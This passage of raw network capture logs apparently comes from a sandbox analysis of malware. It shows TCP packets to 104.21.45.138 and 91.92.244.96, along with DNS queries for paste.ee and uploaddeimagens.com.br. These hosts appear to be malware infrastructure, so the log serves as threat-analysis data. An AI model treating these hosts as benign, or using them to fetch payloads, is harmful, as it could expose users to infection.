                                                  Feb 14, 2024 08:29:58.491403103 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.491409063 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.491425991 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.491492033 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.491525888 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.491532087 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.491539955 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.491569996 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.491626978 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.492278099 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.492312908 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.492331028 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.492336988 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.492348909 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.492460966 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.492499113 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.492506027 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.492512941 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.492538929 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.492569923 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.493833065 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.493866920 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.493890047 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.493895054 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.493907928 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.494077921 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.494115114 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.494127035 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.494132996 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.494158030 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.495094061 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.495127916 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.495137930 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.495143890 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.495176077 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.495275974 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.495316029 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.495320082 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.495327950 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.495357037 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.495378017 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.496454000 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.496489048 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.496504068 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.496510029 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.496529102 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.496622086 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.496659994 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.496665001 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.496673107 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.496707916 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.496764898 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.497711897 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.497751951 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.497762918 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.497769117 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.497791052 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.497910976 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.497950077 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.497961998 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.497967005 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.497997999 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.499114990 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.499149084 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.499167919 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.499174118 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.499186993 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.499293089 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.499330044 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.499339104 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.499347925 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.499377012 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.499458075 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.500340939 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.500375032 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.500392914 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.500397921 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.500411987 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.500488043 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.500531912 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.500536919 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.500543118 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.500575066 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.500634909 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.501997948 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.502032042 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.502053022 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.502058029 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.502068996 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.502079010 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.502154112 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.502192020 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.502193928 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.502206087 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.502237082 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.502279997 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.503006935 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.503041029 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.503057003 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.503062963 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.503081083 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.503180027 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.503218889 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.503222942 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.503232002 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.503261089 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.503299952 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.504792929 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.504842043 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.504846096 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.504856110 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.504885912 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.504949093 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.504981995 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.504991055 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.504996061 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.505023956 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.505069971 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.505877018 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.505928040 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.505930901 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.505939960 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.505974054 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.506023884 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.506058931 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.506067038 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.506072998 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.506119013 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.506172895 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.507272959 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.507308960 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.507324934 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.507330894 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.507343054 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.507587910 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.507627964 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.507632971 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.507641077 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.507664919 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.507673979 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.508301973 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.508335114 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.508351088 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.508356094 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.508378029 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.508706093 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.508744001 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.508754969 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.508760929 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.508784056 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.509995937 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.510030985 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.510040998 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.510047913 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.510073900 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.510248899 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.510288000 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.510298014 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.510303974 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.510339975 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.511132956 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.511173010 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.511188030 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.511193991 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.511219025 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.511238098 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.511535883 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.511571884 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.511596918 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.511603117 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.511614084 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.511635065 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.512999058 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.513036966 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.513047934 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.513053894 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.513088942 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.513227940 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.513262033 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.513269901 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.513278008 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.513303995 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.513452053 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.513489008 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.513499022 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.513504982 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.513533115 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.513552904 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.513710022 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.513744116 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.513753891 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.513760090 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.513783932 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.514911890 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.514950037 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.514961958 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.514969110 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.514996052 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.515863895 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.515897989 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.515919924 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.515925884 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.515942097 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.515985012 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.516030073 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.516031027 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.516041040 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.516073942 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.516098022 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.516124010 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.516158104 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.516174078 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.516180038 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.516195059 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.516195059 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.516263008 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.517375946 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.517415047 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.517424107 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.517431974 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.517458916 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.517494917 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.517612934 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.517647982 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.517654896 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.517661095 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.517687082 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.518465996 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.518503904 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.518515110 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.518521070 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.518547058 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.518589020 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.518624067 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.518635988 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.518641949 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.518651009 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.518670082 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.518718958 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.519985914 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.520024061 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.520041943 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.520046949 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.520056963 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.520237923 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.520282030 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.520292997 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.520298958 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.520323038 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.520967007 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.520999908 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.521009922 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.521024942 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.521035910 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.521229982 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.521267891 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.521270990 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.521280050 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.521301985 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.521308899 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.522639036 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.522671938 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.522692919 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.522697926 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.522707939 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.522865057 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.523348093 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.523381948 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.523396015 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.523401022 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.523420095 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.523473978 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.523511887 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.523511887 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.523523092 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.523555040 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.523592949 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.523597956 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.523633957 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.523643017 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.523648977 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.523672104 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.523693085 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.524967909 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.525007010 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.525012970 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.525021076 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.525058985 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.525108099 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.525141954 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.525150061 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.525156021 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.525166988 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.525177956 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.525285959 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.525908947 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.525944948 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.525959969 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.525971889 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.525985956 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.526078939 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.526113987 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.526118040 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.526129007 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.526156902 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.526185989 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.527061939 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.527096987 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.527112961 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.527123928 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.527134895 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.527142048 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.527235985 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.527267933 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.527277946 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.527286053 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.527308941 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.527329922 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.527333975 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.527379990 CET44349171104.21.45.138192.168.2.22
                                                  Feb 14, 2024 08:29:58.527594090 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:29:58.529813051 CET49171443192.168.2.22104.21.45.138
                                                  Feb 14, 2024 08:30:01.497191906 CET804916691.92.244.96192.168.2.22
                                                  Feb 14, 2024 08:30:01.497988939 CET4916680192.168.2.2291.92.244.96
                                                  Feb 14, 2024 08:30:01.498946905 CET4916680192.168.2.2291.92.244.96
                                                  Feb 14, 2024 08:30:01.694026947 CET804916691.92.244.96192.168.2.22
                                                  Feb 14, 2024 08:30:44.202676058 CET4916780192.168.2.2291.92.244.96

                                                  UDP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Feb 14, 2024 08:29:52.866769075 CET5456253192.168.2.228.8.8.8
                                                  Feb 14, 2024 08:29:52.972652912 CET53545628.8.8.8192.168.2.22
                                                  Feb 14, 2024 08:29:52.979480028 CET5291753192.168.2.228.8.8.8
                                                  Feb 14, 2024 08:29:53.085058928 CET53529178.8.8.8192.168.2.22
                                                  Feb 14, 2024 08:29:56.608724117 CET6275153192.168.2.228.8.8.8
                                                  Feb 14, 2024 08:29:56.833672047 CET53627518.8.8.8192.168.2.22

                                                  DNS Queries

                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                  Feb 14, 2024 08:29:52.866769075 CET192.168.2.228.8.8.80x1f81Standard query (0)paste.eeA (IP address)IN (0x0001)false
                                                  Feb 14, 2024 08:29:52.979480028 CET192.168.2.228.8.8.80x7529Standard query (0)paste.eeA (IP address)IN (0x0001)false
                                                  Feb 14, 2024 08:29:56.608724117 CET192.168.2.228.8.8.80xbff8Standard query (0)uploaddeimagens.com.brA (IP address)IN (0x0001)false

                                                  DNS Answers

